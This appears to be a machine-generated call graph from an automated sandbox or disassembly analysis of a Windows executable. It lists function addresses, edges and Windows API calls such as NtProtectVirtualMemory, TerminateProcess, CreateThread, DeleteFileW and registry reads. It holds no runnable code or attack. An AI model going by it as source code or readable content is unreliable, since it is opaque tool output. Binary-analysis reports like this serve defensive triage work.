103093 fd7c85 103543 f5bd07 8 API calls 103093->103543 103097 fd7c3b 103094->103097 103099 fd7d00 103095->103099 103098 f62b20 206 API calls 103097->103098 103098->103081 103100 fd7d07 103099->103100 103101 fd7d53 103099->103101 103105 fc148b 8 API calls 103100->103105 103102 f58ec0 52 API calls 103101->103102 103103 fd7d5b 103102->103103 103544 f6aa65 9 API calls 103103->103544 103106 fd7d35 103105->103106 103107 f62b20 206 API calls 103106->103107 103107->103081 103108 fd7d65 103108->103081 103109 f58ec0 52 API calls 103108->103109 103110 fd7d80 103109->103110 103545 f5bd07 8 API calls 103110->103545 103112->102863 103113->102823 103115 f5b338 _wcslen 103114->103115 103116 f7017b 8 API calls 103115->103116 103117 f5b360 __fread_nolock 103116->103117 103118 f7014b 8 API calls 103117->103118 103119 f5b376 103118->103119 103119->102836 103120->102833 103121->102837 103122->102849 103123->102849 103124->102862 103125->102862 103126->102862 103127->102860 103128->102862 103129->102911 103130->102908 103131->102912 103132->102915 103170 fc02aa 103133->103170 103136 fc040b 103139 fc0471 103136->103139 103142 fc041b 103136->103142 103137 fc03f3 103186 fc05e9 56 API calls __fread_nolock 103137->103186 103140 fc0507 103139->103140 103141 fc04a1 103139->103141 103159 fc0399 __fread_nolock 103139->103159 103145 fc05b0 103140->103145 103146 fc0510 103140->103146 103143 fc04a6 103141->103143 103144 fc04d1 103141->103144 103147 fc0453 103142->103147 103187 fc2855 10 API calls 103142->103187 103143->103159 103190 f5ca5b 39 API calls 103143->103190 103144->103159 103191 f5ca5b 39 API calls 103144->103191 103145->103159 103195 f5c63f 39 API calls 103145->103195 103148 fc058d 103146->103148 103149 fc0515 103146->103149 103177 fc1844 103147->103177 103148->103159 103194 f5c63f 39 API calls 103148->103194 103153 fc051b 103149->103153 103154 fc0554 103149->103154 103153->103159 103192 f5c63f 39 API calls 103153->103192 103154->103159 103193 f5c63f 39 API calls 103154->103193 103159->102923 103160 fc0427 103188 fc2855 10 API calls 103160->103188 103163 fc043e __fread_nolock 103189 fc2855 10 API calls 103163->103189 103166 f5c99e 103165->103166 103167 f5c9a5 103165->103167 103166->103167 103209 f76641 39 API calls _strftime 103166->103209 103167->102917 103169 f5c9e8 103169->102917 103171 fc02f7 103170->103171 103175 fc02bb 103170->103175 103173 f5c98d 39 API calls 103171->103173 103172 fc02f5 103172->103136 103172->103137 103172->103159 103173->103172 103174 f58ec0 52 API calls 103174->103175 103175->103172 103175->103174 103196 f74d98 103175->103196 103178 fc184f 103177->103178 103179 f7014b 8 API calls 103178->103179 103180 fc1856 103179->103180 103181 fc1862 103180->103181 103182 fc1883 103180->103182 103184 f7017b 8 API calls 103181->103184 103183 f7017b 8 API calls 103182->103183 103185 fc186b ___scrt_fastfail 103183->103185 103184->103185 103185->103159 103186->103159 103187->103160 103188->103163 103189->103147 103190->103159 103191->103159 103192->103159 103193->103159 103194->103159 103195->103159 103197 f74da6 103196->103197 103198 f74e1b 103196->103198 103205 f74dcb 103197->103205 103206 f7f649 20 API calls __dosmaperr 103197->103206 103208 f74e2d 40 API calls 2 library calls 103198->103208 103201 f74e28 103201->103175 103202 f74db2 103207 f82b5c 26 API calls _strftime 103202->103207 103204 f74dbd 103204->103175 103205->103175 103206->103202 103207->103204 103208->103201 103209->103169 103211 f7014b 8 API calls 103210->103211 103212 f5894a 103211->103212 103213 f58a60 103212->103213 103214 f58a76 103213->103214 103215 f96737 103214->103215 103221 f58a80 103214->103221 103246 f6b7a2 8 API calls 103215->103246 103217 f96744 103247 f5b4c8 8 API calls 103217->103247 103219 f96762 103219->103219 103220 f58b94 103222 f7014b 8 API calls 103220->103222 103221->103217 103221->103220 103223 f58b9b 103221->103223 103222->103223 103223->102996 103225 f57e1a 103224->103225 103226 f7014b 8 API calls 103225->103226 103227 f57e28 103226->103227 103248 f58445 103227->103248 103251 f5c760 103230->103251 103232 f58480 103233 f7017b 8 API calls 103232->103233 103234 f5851c 103232->103234 103233->103234 103235 f5bd57 103234->103235 103236 f5bd71 103235->103236 103240 f5bd64 103235->103240 103237 f7014b 8 API calls 103236->103237 103238 f5bd7b 103237->103238 103239 f7017b 8 API calls 103238->103239 103239->103240 103240->102993 103241->102993 103242->102973 103243->102975 103244->102989 103245->102994 103246->103217 103247->103219 103249 f7014b 8 API calls 103248->103249 103250 f57e30 103249->103250 103250->102947 103250->102948 103252 f5c76b 103251->103252 103253 fa1285 103252->103253 103258 f5c773 messages 103252->103258 103254 f7014b 8 API calls 103253->103254 103256 fa1291 103254->103256 103255 f5c77a 103255->103232 103258->103255 103259 f5c7e0 103258->103259 103260 f5c7eb messages 103259->103260 103262 f5c826 messages 103260->103262 103263 f6e322 8 API calls messages 103260->103263 103262->103258 103263->103262 103274 fbe80e 103264->103274 103266 fbde86 CloseHandle 103266->103003 103267 fbddd4 Process32NextW 103267->103266 103273 fbddcd 103267->103273 103268 f5bf73 8 API calls 103268->103273 103269 f5b329 8 API calls 103269->103273 103271 f57bb5 8 API calls 103271->103273 103273->103266 103273->103267 103273->103268 103273->103269 103273->103271 103280 f5568e 103273->103280 103322 f6e36b 41 API calls 103273->103322 103275 fbe819 103274->103275 103276 fbe830 103275->103276 103279 fbe836 103275->103279 103323 f76722 GetStringTypeW _strftime 103275->103323 103324 f7666b 39 API calls _strftime 103276->103324 103279->103273 103281 f5bf73 8 API calls 103280->103281 103282 f556a4 103281->103282 103283 f5bf73 8 API calls 103282->103283 103284 f556ac 103283->103284 103285 f5bf73 8 API calls 103284->103285 103286 f556b4 103285->103286 103287 f5bf73 8 API calls 103286->103287 103288 f556bc 103287->103288 103289 f556f0 103288->103289 103290 f94da1 103288->103290 103292 f5acc0 8 API calls 103289->103292 103291 f5bed9 8 API calls 103290->103291 103293 f94daa 103291->103293 103294 f556fe 103292->103294 103295 f5bd57 8 API calls 103293->103295 103296 f5adf4 8 API calls 103294->103296 103298 f55733 103295->103298 103297 f55708 103296->103297 103297->103298 103299 f5acc0 8 API calls 103297->103299 103300 f55754 103298->103300 103307 f94dcc 103298->103307 103316 f55778 103298->103316 103302 f55729 103299->103302 103300->103316 103337 f5655e 103300->103337 103303 f5adf4 8 API calls 103302->103303 103303->103298 103304 f55789 103305 f5579f 103304->103305 103311 f5bed9 8 API calls 103304->103311 103308 f557b3 103305->103308 103314 f5bed9 8 API calls 103305->103314 103310 f58577 8 API calls 103307->103310 103312 f557be 103308->103312 103315 f5bed9 8 API calls 103308->103315 103319 f94e8c 103310->103319 103311->103305 103317 f5bed9 8 API calls 103312->103317 103320 f557c9 103312->103320 103313 f5acc0 8 API calls 103313->103316 103314->103308 103315->103312 103325 f5acc0 103316->103325 103317->103320 103318 f5655e 8 API calls 103318->103319 103319->103316 103319->103318 103340 f5ad40 8 API calls __fread_nolock 103319->103340 103320->103273 103322->103273 103323->103275 103324->103279 103327 f5ace1 103325->103327 103336 f5accf 103325->103336 103326 f5c2c9 8 API calls 103328 fa05a3 __fread_nolock 103326->103328 103329 f5ad07 103327->103329 103330 fa0557 103327->103330 103327->103336 103341 f588e8 8 API calls 103329->103341 103331 f7014b 8 API calls 103330->103331 103333 fa0561 103331->103333 103335 f7017b 8 API calls 103333->103335 103334 f5acda __fread_nolock 103334->103304 103335->103336 103336->103326 103336->103334 103338 f5c2c9 8 API calls 103337->103338 103339 f55761 103338->103339 103339->103313 103339->103316 103340->103319 103341->103334 103343 fc18b6 103342->103343 103344 f7014b 8 API calls 103343->103344 103345 fc18bd 103344->103345 103348 fbfcb5 103345->103348 103347 fc18f7 103347->103009 103349 f5c2c9 8 API calls 103348->103349 103350 fbfcc8 CharLowerBuffW 103349->103350 103353 fbfcdb 103350->103353 103351 fbfce5 ___scrt_fastfail 103351->103347 103352 fbfd19 103355 fbfd2b 103352->103355 103356 f5655e 8 API calls 103352->103356 103353->103351 103353->103352 103354 f5655e 8 API calls 103353->103354 103354->103353 103357 f7017b 8 API calls 103355->103357 103356->103355 103362 fbfd59 103357->103362 103358 fbfd7b 103366 fbfe0c 103358->103366 103361 fbfdb8 103361->103351 103363 f7014b 8 API calls 103361->103363 103362->103358 103381 fbfbed 8 API calls 103362->103381 103364 fbfdd2 103363->103364 103365 f7017b 8 API calls 103364->103365 103365->103351 103367 f5bf73 8 API calls 103366->103367 103368 fbfe3e 103367->103368 103369 f5bf73 8 API calls 103368->103369 103370 fbfe47 103369->103370 103371 f5bf73 8 API calls 103370->103371 103375 fbfe50 103371->103375 103372 f58577 8 API calls 103372->103375 103373 f766f8 GetStringTypeW 103373->103375 103374 fc0114 103374->103361 103375->103372 103375->103373 103375->103374 103377 f76641 39 API calls 103375->103377 103378 fbfe0c 40 API calls 103375->103378 103379 f5ad40 8 API calls 103375->103379 103380 f5bed9 8 API calls 103375->103380 103382 f76722 GetStringTypeW _strftime 103375->103382 103377->103375 103378->103375 103379->103375 103380->103375 103381->103362 103382->103375 103384 f5bf73 8 API calls 103383->103384 103385 fbdc73 103384->103385 103386 f5bf73 8 API calls 103385->103386 103387 fbdc7c 103386->103387 103388 f5bf73 8 API calls 103387->103388 103389 fbdc85 103388->103389 103407 f55851 103389->103407 103394 fbdcab 103396 f5568e 8 API calls 103394->103396 103395 f56b7c 8 API calls 103395->103394 103397 fbdcbf FindFirstFileW 103396->103397 103398 fbdd4b FindClose 103397->103398 103401 fbdcde 103397->103401 103404 fbdd56 103398->103404 103399 fbdd26 FindNextFileW 103399->103401 103400 f5bed9 8 API calls 103400->103401 103401->103398 103401->103399 103401->103400 103402 f57bb5 8 API calls 103401->103402 103403 f56b7c 8 API calls 103401->103403 103402->103401 103405 fbdd17 DeleteFileW 103403->103405 103404->103014 103405->103399 103406 fbdd42 FindClose 103405->103406 103406->103404 103419 f922d0 103407->103419 103410 f5587d 103412 f58577 8 API calls 103410->103412 103411 f55898 103413 f5bd57 8 API calls 103411->103413 103414 f55889 103412->103414 103413->103414 103421 f555dc 103414->103421 103417 fbeab0 GetFileAttributesW 103418 fbdc99 103417->103418 103418->103394 103418->103395 103420 f5585e GetFullPathNameW 103419->103420 103420->103410 103420->103411 103422 f555ea 103421->103422 103423 f5adf4 8 API calls 103422->103423 103424 f555fe 103423->103424 103424->103417 103426 f7017b 8 API calls 103425->103426 103427 f6c209 103426->103427 103428 f7014b 8 API calls 103427->103428 103429 f6c215 103428->103429 103429->103026 103431 f6fa35 103430->103431 103432 f6f9fe 103430->103432 103442 f6fe8a 8 API calls 103431->103442 103434 f7017b 8 API calls 103432->103434 103435 f6fa05 WideCharToMultiByte 103434->103435 103441 f6fa3e 8 API calls __fread_nolock 103435->103441 103437 f6fa29 103437->103030 103439 f7014b 8 API calls 103438->103439 103440 f5424e 103439->103440 103440->103037 103440->103038 103441->103437 103442->103437 103444 f58ec0 52 API calls 103443->103444 103445 fd89ed 103444->103445 103468 fd8a32 messages 103445->103468 103481 fd9730 103445->103481 103447 fd8cde 103448 fd8eac 103447->103448 103452 fd8cec 103447->103452 103520 fd9941 59 API calls 103448->103520 103451 fd8ebb 103451->103452 103453 fd8ec7 103451->103453 103494 fd88e3 103452->103494 103453->103468 103454 f58ec0 52 API calls 103470 fd8aa6 103454->103470 103459 fd8d25 103508 f6ffe0 103459->103508 103462 fd8d5f 103465 f57e12 8 API calls 103462->103465 103463 fd8d45 103515 fc3fe1 81 API calls __wsopen_s 103463->103515 103467 fd8d6e 103465->103467 103466 fd8d50 GetCurrentProcess TerminateProcess 103466->103462 103469 f58470 8 API calls 103467->103469 103468->103044 103471 fd8d87 103469->103471 103470->103447 103470->103454 103470->103468 103513 fb4ad3 8 API calls __fread_nolock 103470->103513 103514 fd8f7a 41 API calls _strftime 103470->103514 103479 fd8daf 103471->103479 103516 f61ca0 8 API calls 103471->103516 103473 fd8f22 103473->103468 103477 fd8f36 FreeLibrary 103473->103477 103474 fd8d9e 103517 fd95d8 74 API calls 103474->103517 103477->103468 103479->103473 103518 f61ca0 8 API calls 103479->103518 103519 f5b4c8 8 API calls 103479->103519 103521 fd95d8 74 API calls 103479->103521 103482 f5c2c9 8 API calls 103481->103482 103483 fd974b CharLowerBuffW 103482->103483 103522 fb9805 103483->103522 103487 f5bf73 8 API calls 103488 fd9787 103487->103488 103489 f5acc0 8 API calls 103488->103489 103490 fd979b 103489->103490 103491 f5adf4 8 API calls 103490->103491 103493 fd97a5 _wcslen 103491->103493 103492 fd98bb _wcslen 103492->103470 103493->103492 103529 fd8f7a 41 API calls _strftime 103493->103529 103495 fd88fe 103494->103495 103499 fd8949 103494->103499 103496 f7017b 8 API calls 103495->103496 103498 fd8920 103496->103498 103497 f7014b 8 API calls 103497->103498 103498->103497 103498->103499 103500 fd9af3 103499->103500 103501 fd9d08 messages 103500->103501 103503 fd9b17 _strcat _wcslen ___std_exception_copy 103500->103503 103501->103459 103502 f5ca5b 39 API calls 103502->103503 103503->103501 103503->103502 103504 f5c98d 39 API calls 103503->103504 103505 f5c63f 39 API calls 103503->103505 103506 f58ec0 52 API calls 103503->103506 103532 fbf8c5 10 API calls _wcslen 103503->103532 103504->103503 103505->103503 103506->103503 103509 f6fff5 103508->103509 103510 f7008d NtProtectVirtualMemory 103509->103510 103511 f7007b CloseHandle 103509->103511 103512 f7005b 103509->103512 103510->103512 103511->103512 103512->103462 103512->103463 103513->103470 103514->103470 103515->103466 103516->103474 103517->103479 103518->103479 103519->103479 103520->103451 103521->103479 103523 fb9825 _wcslen 103522->103523 103524 fb9914 103523->103524 103526 fb9919 103523->103526 103527 fb985a 103523->103527 103524->103487 103524->103493 103526->103524 103531 f6e36b 41 API calls 103526->103531 103527->103524 103530 f6e36b 41 API calls 103527->103530 103529->103492 103530->103527 103531->103526 103532->103503 103533->103053 103535 f7014b 8 API calls 103534->103535 103536 f6bc65 103535->103536 103537 f5b329 8 API calls 103536->103537 103538 f6bc70 103537->103538 103538->103061 103539->103064 103540->103064 103541->103081 103542->103093 103543->103081 103544->103108 103545->103081 103546->102887 103547->102887 103548->102891 103549->102886 103550->102791 103551->102783 103552->102786 103553->102786 103554 f60ebf 103555 f60ed3 103554->103555 103561 f61425 103554->103561 103556 f60ee5 103555->103556 103557 f7014b 8 API calls 103555->103557 103558 fa562c 103556->103558 103560 f60f3e 103556->103560 103587 f5b4c8 8 API calls 103556->103587 103557->103556 103588 fc1b14 8 API calls 103558->103588 103563 f62b20 207 API calls 103560->103563 103580 f6049d messages 103560->103580 103561->103556 103564 f5bed9 8 API calls 103561->103564 103586 f60376 messages 103563->103586 103564->103556 103565 f7014b 8 API calls 103565->103586 103566 fa632b 103592 fc3fe1 81 API calls __wsopen_s 103566->103592 103567 f61e50 40 API calls 103567->103586 103568 f61695 103575 f5bed9 8 API calls 103568->103575 103568->103580 103570 fa625a 103591 fc3fe1 81 API calls __wsopen_s 103570->103591 103571 f5bed9 8 API calls 103571->103586 103572 fa5cdb 103577 f5bed9 8 API calls 103572->103577 103572->103580 103575->103580 103576 f61990 207 API calls 103576->103586 103577->103580 103578 f705b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103578->103586 103579 f5bf73 8 API calls 103579->103586 103581 f70568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103581->103586 103582 fa6115 103589 fc3fe1 81 API calls __wsopen_s 103582->103589 103584 f70413 29 API calls pre_c_initialization 103584->103586 103585 f60aae messages 103590 fc3fe1 81 API calls __wsopen_s 103585->103590 103586->103565 103586->103566 103586->103567 103586->103568 103586->103570 103586->103571 103586->103572 103586->103576 103586->103578 103586->103579 103586->103580 103586->103581 103586->103582 103586->103584 103586->103585 103587->103556 103588->103580 103589->103585 103590->103580 103591->103580 103592->103580 104602 f5f4dc 104603 f5cab0 207 API calls 104602->104603 104604 f5f4ea 104603->104604 104605 fa5650 104614 f6e3d5 104605->104614 104607 fa5666 104609 fa56e1 104607->104609 104623 f6aa65 9 API calls 104607->104623 104612 fa61d7 104609->104612 104625 fc3fe1 81 API calls __wsopen_s 104609->104625 104611 fa56c1 104611->104609 104624 fc247e 8 API calls 104611->104624 104615 f6e3f6 104614->104615 104616 f6e3e3 104614->104616 104618 f6e3fb 104615->104618 104619 f6e429 104615->104619 104626 f5b4c8 8 API calls 104616->104626 104620 f7014b 8 API calls 104618->104620 104627 f5b4c8 8 API calls 104619->104627 104622 f6e3ed 104620->104622 104622->104607 104623->104611 104624->104609 104625->104612 104626->104622 104627->104622 104628 f6235c 104629 f62365 __fread_nolock 104628->104629 104630 f58ec0 52 API calls 104629->104630 104631 f61ff7 __fread_nolock 104629->104631 104632 fa74e3 104629->104632 104635 f623b6 104629->104635 104636 f7014b 8 API calls 104629->104636 104639 f7017b 8 API calls 104629->104639 104630->104629 104640 fb13c8 8 API calls __fread_nolock 104632->104640 104634 fa74ef 104634->104631 104638 f5bed9 8 API calls 104634->104638 104637 f57d74 8 API calls 104635->104637 104636->104629 104637->104631 104638->104631 104639->104629 104640->104634 104641 f51098 104646 f55fc8 104641->104646 104645 f510a7 104647 f5bf73 8 API calls 104646->104647 104648 f55fdf GetVersionExW 104647->104648 104649 f58577 8 API calls 104648->104649 104650 f5602c 104649->104650 104651 f5adf4 8 API calls 104650->104651 104660 f56062 104650->104660 104652 f56056 104651->104652 104654 f555dc 8 API calls 104652->104654 104653 f5611c GetCurrentProcess IsWow64Process 104655 f56138 104653->104655 104654->104660 104656 f95269 GetSystemInfo 104655->104656 104657 f56150 LoadLibraryA 104655->104657 104658 f56161 GetProcAddress 104657->104658 104659 f5619d GetSystemInfo 104657->104659 104658->104659 104662 f56171 GetNativeSystemInfo 104658->104662 104663 f56177 104659->104663 104660->104653 104661 f95224 104660->104661 104662->104663 104664 f5109d 104663->104664 104665 f5617b FreeLibrary 104663->104665 104666 f70413 29 API calls __onexit 104664->104666 104665->104664 104666->104645 104667 f5105b 104672 f552a7 104667->104672 104669 f5106a 104703 f70413 29 API calls __onexit 104669->104703 104671 f51074 104673 f552b7 __wsopen_s 104672->104673 104674 f5bf73 8 API calls 104673->104674 104675 f5536d 104674->104675 104676 f55594 10 API calls 104675->104676 104677 f55376 104676->104677 104704 f55238 104677->104704 104680 f56b7c 8 API calls 104681 f5538f 104680->104681 104682 f56a7c 8 API calls 104681->104682 104683 f5539e 104682->104683 104684 f5bf73 8 API calls 104683->104684 104685 f553a7 104684->104685 104686 f5bd57 8 API calls 104685->104686 104687 f553b0 RegOpenKeyExW 104686->104687 104688 f94be6 RegQueryValueExW 104687->104688 104693 f553d2 104687->104693 104689 f94c7c RegCloseKey 104688->104689 104690 f94c03 104688->104690 104689->104693 104701 f94c8e _wcslen 104689->104701 104691 f7017b 8 API calls 104690->104691 104692 f94c1c 104691->104692 104694 f5423c 8 API calls 104692->104694 104693->104669 104695 f94c27 RegQueryValueExW 104694->104695 104696 f94c44 104695->104696 104698 f94c5e messages 104695->104698 104697 f58577 8 API calls 104696->104697 104697->104698 104698->104689 104699 f5b329 8 API calls 104699->104701 104700 f56a7c 8 API calls 104700->104701 104701->104693 104701->104699 104701->104700 104702 f5655e 8 API calls 104701->104702 104702->104701 104703->104671 104705 f922d0 __wsopen_s 104704->104705 104706 f55245 GetFullPathNameW 104705->104706 104707 f55267 104706->104707 104708 f58577 8 API calls 104707->104708 104709 f55285 104708->104709 104709->104680 104710 fa6555 104711 f7014b 8 API calls 104710->104711 104712 fa655c 104711->104712 104714 f7017b 8 API calls 104712->104714 104716 fa6575 __fread_nolock 104712->104716 104713 f7017b 8 API calls 104715 fa659a 104713->104715 104714->104716 104716->104713 103593 f5f5e5 103596 f5cab0 103593->103596 103597 f5cacb 103596->103597 103598 fa14be 103597->103598 103599 fa150c 103597->103599 103626 f5caf0 103597->103626 103602 fa14c8 103598->103602 103605 fa14d5 103598->103605 103598->103626 103640 fd62ff 207 API calls 2 library calls 103599->103640 103638 fd6790 207 API calls 103602->103638 103604 f6bc58 8 API calls 103604->103626 103619 f5cdc0 103605->103619 103639 fd6c2d 207 API calls 2 library calls 103605->103639 103608 fa179f 103608->103608 103610 f5cf80 39 API calls 103610->103626 103611 f6e807 39 API calls 103611->103626 103614 f5cdee 103615 fa16e8 103643 fd6669 81 API calls 103615->103643 103619->103614 103644 fc3fe1 81 API calls __wsopen_s 103619->103644 103623 f60340 207 API calls 103623->103626 103624 f5bed9 8 API calls 103624->103626 103626->103604 103626->103610 103626->103611 103626->103614 103626->103615 103626->103619 103626->103623 103626->103624 103627 f5be2d 103626->103627 103631 f6e7c1 39 API calls 103626->103631 103632 f6aa99 207 API calls 103626->103632 103633 f705b2 5 API calls __Init_thread_wait 103626->103633 103634 f70413 29 API calls __onexit 103626->103634 103635 f70568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103626->103635 103636 f6f4df 81 API calls 103626->103636 103637 f6f346 207 API calls 103626->103637 103641 f5b4c8 8 API calls 103626->103641 103642 faffaf 8 API calls 103626->103642 103628 f5be38 103627->103628 103630 f5be67 103628->103630 103645 f5bfa5 39 API calls 103628->103645 103630->103626 103631->103626 103632->103626 103633->103626 103634->103626 103635->103626 103636->103626 103637->103626 103638->103605 103639->103619 103640->103626 103641->103626 103642->103626 103643->103619 103644->103608 103645->103630 104717 f618c6 104718 f7014b 8 API calls 104717->104718 104719 f618cd 104718->104719 104720 f51044 104725 f52793 104720->104725 104722 f5104a 104761 f70413 29 API calls __onexit 104722->104761 104724 f51054 104762 f52a38 104725->104762 104729 f5280a 104730 f5bf73 8 API calls 104729->104730 104731 f52814 104730->104731 104732 f5bf73 8 API calls 104731->104732 104733 f5281e 104732->104733 104734 f5bf73 8 API calls 104733->104734 104735 f52828 104734->104735 104736 f5bf73 8 API calls 104735->104736 104737 f52866 104736->104737 104738 f5bf73 8 API calls 104737->104738 104739 f52932 104738->104739 104772 f52dbc 104739->104772 104743 f52964 104744 f5bf73 8 API calls 104743->104744 104745 f5296e 104744->104745 104746 f63160 9 API calls 104745->104746 104747 f52999 104746->104747 104799 f53166 104747->104799 104749 f529b5 104750 f529c5 GetStdHandle 104749->104750 104751 f939e7 104750->104751 104752 f52a1a 104750->104752 104751->104752 104753 f939f0 104751->104753 104755 f52a27 OleInitialize 104752->104755 104754 f7014b 8 API calls 104753->104754 104756 f939f7 104754->104756 104755->104722 104806 fc0ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 104756->104806 104758 f93a00 104807 fc12eb CreateThread 104758->104807 104760 f93a0c CloseHandle 104760->104752 104761->104724 104808 f52a91 104762->104808 104765 f52a91 8 API calls 104766 f52a70 104765->104766 104767 f5bf73 8 API calls 104766->104767 104768 f52a7c 104767->104768 104769 f58577 8 API calls 104768->104769 104770 f527c9 104769->104770 104771 f5327e 6 API calls 104770->104771 104771->104729 104773 f5bf73 8 API calls 104772->104773 104774 f52dcc 104773->104774 104775 f5bf73 8 API calls 104774->104775 104776 f52dd4 104775->104776 104815 f581d6 104776->104815 104779 f581d6 8 API calls 104780 f52de4 104779->104780 104781 f5bf73 8 API calls 104780->104781 104782 f52def 104781->104782 104783 f7014b 8 API calls 104782->104783 104784 f5293c 104783->104784 104785 f53205 104784->104785 104786 f53213 104785->104786 104787 f5bf73 8 API calls 104786->104787 104788 f5321e 104787->104788 104789 f5bf73 8 API calls 104788->104789 104790 f53229 104789->104790 104791 f5bf73 8 API calls 104790->104791 104792 f53234 104791->104792 104793 f5bf73 8 API calls 104792->104793 104794 f5323f 104793->104794 104795 f581d6 8 API calls 104794->104795 104796 f5324a 104795->104796 104797 f7014b 8 API calls 104796->104797 104798 f53251 RegisterWindowMessageW 104797->104798 104798->104743 104800 f53176 104799->104800 104801 f93c8f 104799->104801 104802 f7014b 8 API calls 104800->104802 104818 fc3c4e 8 API calls 104801->104818 104804 f5317e 104802->104804 104804->104749 104805 f93c9a 104806->104758 104807->104760 104819 fc12d1 14 API calls 104807->104819 104809 f5bf73 8 API calls 104808->104809 104810 f52a9c 104809->104810 104811 f5bf73 8 API calls 104810->104811 104812 f52aa4 104811->104812 104813 f5bf73 8 API calls 104812->104813 104814 f52a66 104813->104814 104814->104765 104816 f5bf73 8 API calls 104815->104816 104817 f52ddc 104816->104817 104817->104779 104818->104805 103646 fa65af 103647 f7014b 8 API calls 103646->103647 103648 fa65b6 103647->103648 103652 fbfafb 103648->103652 103650 fa65c2 103651 fbfafb 8 API calls 103650->103651 103651->103650 103653 fbfb1b 103652->103653 103654 fbfbe4 103653->103654 103655 f7017b 8 API calls 103653->103655 103654->103650 103658 fbfb57 103655->103658 103657 fbfb79 103657->103654 103659 f5bed9 8 API calls 103657->103659 103658->103657 103660 fbfbed 8 API calls 103658->103660 103659->103657 103660->103658 104820 f5f4c0 104823 f6a025 104820->104823 104822 f5f4cc 104824 f6a046 104823->104824 104829 f6a0a3 104823->104829 104826 f60340 207 API calls 104824->104826 104824->104829 104830 f6a077 104826->104830 104827 fa806b 104827->104827 104828 f6a0e7 104828->104822 104829->104828 104832 fc3fe1 81 API calls __wsopen_s 104829->104832 104830->104828 104830->104829 104831 f5bed9 8 API calls 104830->104831 104831->104829 104832->104827 104833 fa400f 104839 f5eeb0 messages 104833->104839 104834 f5f0d5 104835 f5f211 PeekMessageW 104835->104839 104836 f5ef07 GetInputState 104836->104835 104836->104839 104838 fa32cd TranslateAcceleratorW 104838->104839 104839->104834 104839->104835 104839->104836 104839->104838 104840 f5f28f PeekMessageW 104839->104840 104841 f5f104 timeGetTime 104839->104841 104842 f5f273 TranslateMessage DispatchMessageW 104839->104842 104843 f5f2af Sleep 104839->104843 104844 fa4183 Sleep 104839->104844 104845 fa33e9 timeGetTime 104839->104845 104862 f60340 207 API calls 104839->104862 104863 f62b20 207 API calls 104839->104863 104865 f5f450 104839->104865 104872 f5f6d0 104839->104872 104895 f6e915 104839->104895 104901 fc446f 8 API calls 104839->104901 104902 fc3fe1 81 API calls __wsopen_s 104839->104902 104840->104839 104841->104839 104842->104840 104848 f5f2c0 104843->104848 104844->104848 104900 f6aa65 9 API calls 104845->104900 104846 f6f215 timeGetTime 104846->104848 104847 fbdd87 46 API calls 104847->104848 104848->104839 104848->104846 104848->104847 104850 fa421a GetExitCodeProcess 104848->104850 104851 fe345b GetForegroundWindow 104848->104851 104856 fa3d51 104848->104856 104857 fa42b8 Sleep 104848->104857 104903 fd60b5 8 API calls 104848->104903 104904 fbf292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104848->104904 104852 fa4230 WaitForSingleObject 104850->104852 104853 fa4246 CloseHandle 104850->104853 104851->104848 104852->104839 104852->104853 104853->104848 104855 fa3d59 104856->104855 104857->104839 104862->104839 104863->104839 104866 f5f483 104865->104866 104867 f5f46f 104865->104867 104937 fc3fe1 81 API calls __wsopen_s 104866->104937 104905 f5e960 104867->104905 104869 f5f47a 104869->104839 104871 fa4584 104871->104871 104873 f5f710 104872->104873 104879 f5f7dc messages 104873->104879 104954 f705b2 5 API calls __Init_thread_wait 104873->104954 104876 fa45d9 104878 f5bf73 8 API calls 104876->104878 104876->104879 104877 f5bf73 8 API calls 104877->104879 104881 fa45f3 104878->104881 104879->104877 104882 f5be2d 39 API calls 104879->104882 104888 f60340 207 API calls 104879->104888 104889 f5bed9 8 API calls 104879->104889 104890 f61ca0 8 API calls 104879->104890 104891 f5fae1 104879->104891 104892 fc3fe1 81 API calls 104879->104892 104953 f6b35c 207 API calls 104879->104953 104957 f705b2 5 API calls __Init_thread_wait 104879->104957 104958 f70413 29 API calls __onexit 104879->104958 104959 f70568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104879->104959 104960 fd5231 101 API calls 104879->104960 104961 fd731e 207 API calls 104879->104961 104955 f70413 29 API calls __onexit 104881->104955 104882->104879 104884 fa45fd 104956 f70568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104884->104956 104888->104879 104889->104879 104890->104879 104891->104839 104892->104879 104896 f6e959 104895->104896 104897 f6e928 104895->104897 104896->104839 104897->104896 104898 f6e94c IsDialogMessageW 104897->104898 104899 faeff6 GetClassLongW 104897->104899 104898->104896 104898->104897 104899->104897 104899->104898 104900->104839 104901->104839 104902->104839 104903->104848 104904->104848 104906 f60340 207 API calls 104905->104906 104908 f5e99d 104906->104908 104909 f5ea0b messages 104908->104909 104910 f5edd5 104908->104910 104911 f5eac3 104908->104911 104918 f5ebb8 104908->104918 104922 fa31d3 104908->104922 104925 f7014b 8 API calls 104908->104925 104932 f5eb29 __fread_nolock messages 104908->104932 104909->104869 104910->104909 104917 f7017b 8 API calls 104910->104917 104911->104910 104913 f5eace 104911->104913 104912 f5ecff 104915 f5ed14 104912->104915 104916 fa31c4 104912->104916 104914 f7014b 8 API calls 104913->104914 104924 f5ead5 __fread_nolock 104914->104924 104919 f7014b 8 API calls 104915->104919 104950 fd6162 8 API calls 104916->104950 104917->104924 104921 f7017b 8 API calls 104918->104921 104928 f5eb6a 104919->104928 104921->104932 104951 fc3fe1 81 API calls __wsopen_s 104922->104951 104923 f7014b 8 API calls 104926 f5eaf6 104923->104926 104924->104923 104924->104926 104925->104908 104926->104932 104938 f5d260 104926->104938 104928->104869 104929 fa31b3 104949 fc3fe1 81 API calls __wsopen_s 104929->104949 104932->104912 104932->104928 104932->104929 104933 fa318e 104932->104933 104935 fa316c 104932->104935 104946 f544fe 207 API calls 104932->104946 104948 fc3fe1 81 API calls __wsopen_s 104933->104948 104947 fc3fe1 81 API calls __wsopen_s 104935->104947 104937->104871 104939 f5d29a 104938->104939 104940 f5d2c6 104938->104940 104941 f5f6d0 207 API calls 104939->104941 104944 f5d2a0 104939->104944 104942 f60340 207 API calls 104940->104942 104941->104944 104943 fa184b 104942->104943 104943->104944 104952 fc3fe1 81 API calls __wsopen_s 104943->104952 104944->104932 104944->104944 104946->104932 